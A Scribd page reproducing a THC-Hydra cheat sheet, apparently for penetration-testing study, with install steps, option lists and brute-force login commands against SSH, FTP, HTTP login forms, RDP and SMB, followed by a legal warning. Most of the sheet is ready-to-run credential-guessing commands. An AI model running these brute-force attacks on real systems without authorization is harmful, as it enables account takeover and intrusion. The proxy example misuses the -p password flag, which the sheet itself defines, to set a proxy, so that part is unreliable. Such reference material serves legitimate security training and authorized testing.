Scribd
Upload
161 views4 pages

Hydra Cheat Sheet

The THC-Hydra Cheat Sheet provides installation instructions for Linux, macOS, and Windows, along with basic syntax and options for using the Hydra login cracker. It lists common protocols supported by Hydra and provides examples for brute force attacks on SSH, FTP, HTTP, RDP, and SMB. Additionally, it includes advanced options for proxy support, custom headers, and legal warnings regarding ethical usage.

Uploaded by

parajulidavid51
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
161 views4 pages

Hydra Cheat Sheet

The THC-Hydra Cheat Sheet provides installation instructions for Linux, macOS, and Windows, along with basic syntax and options for using the Hydra login cracker. It lists common protocols supported by Hydra and provides examples for brute force attacks on SSH, FTP, HTTP, RDP, and SMB. Additionally, it includes advanced options for proxy support, custom headers, and legal warnings regarding ethical usage.

Uploaded by

parajulidavid51
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

THC-HYDRA CHEAT SHEET (2025 Edition)

THC-HYDRA CHEAT SHEET (2025 Edition)

Hydra is a fast and flexible login cracker supporting numerous protocols.

INSTALLATION

Linux (Debian/Ubuntu):

sudo apt update

sudo apt install hydra

macOS (with Homebrew):

brew install hydra

Windows:

- Get from: https://github.com/vanhauser-thc/thc-hydra

- Use WSL (Windows Subsystem for Linux) for full support.

BASIC SYNTAX

hydra [OPTIONS] -l USER or -L FILE -p PASS or -P FILE [PROTOCOL]://[TARGET]

Basic Options:

-l Single username

-L File of usernames

-p Single password

-P File of passwords
-s Port (if non-default)

-t Number of parallel tasks (default: 16)

-v Verbose mode

-V Shows each login attempt

-f Exit after first valid password

-o Output file

-F Exit after one valid login per host

-e nsr Try null password, same as user, reversed login

-u Loop mode

COMMON PROTOCOLS

ftp, ssh, telnet, http-get, http-post-form, rdp, smtp, pop3, imap, vnc, smb, rexec, rlogin,
pcanywhere

EXAMPLES

SSH Brute Force:

hydra -l root -P rockyou.txt ssh://192.168.1.10

FTP Brute Force:

hydra -L users.txt -P pass.txt ftp://192.168.1.10

HTTP Form POST Attack:

hydra -l admin -P rockyou.txt


http-post-form://192.168.1.10/login.php:user=^USER^&pass=^PASS^:F=Login failed

RDP Attack:

hydra -L users.txt -P passwords.txt rdp://192.168.1.100


SMB Attack:

hydra -L users.txt -P passwords.txt smb://192.168.1.20

ADVANCED OPTIONS

Add Proxy Support:

hydra -l admin -P rockyou.txt -s 8080 -p proxy_host:proxy_port http-get://target

Bruteforce Passwords Only:

hydra -l admin -P passwords.txt -t 4 -vV ftp://192.168.0.100

Bruteforce Usernames Only:

hydra -L users.txt -p secret123 ssh://target.com

Add Custom Headers:

hydra -l admin -P pass.txt


http-post-form://site.com/login.php:"user=^USER^&pass=^PASS^:F=Invalid
login":H="User-Agent: CustomAgent"

OUTPUT & LOGGING

-o file.txt Save successful attempts

-b json Output in JSON format

TIPS

- Use -V for verbose login attempts.

- Use -f to stop after the first valid password.

- Use --help for the full module list.


- Combine with tools like Crunch to generate wordlists.

LEGAL WARNING

Use Hydra only on systems you own or have permission to test. Unauthorized use is illegal
and unethical.

You might also like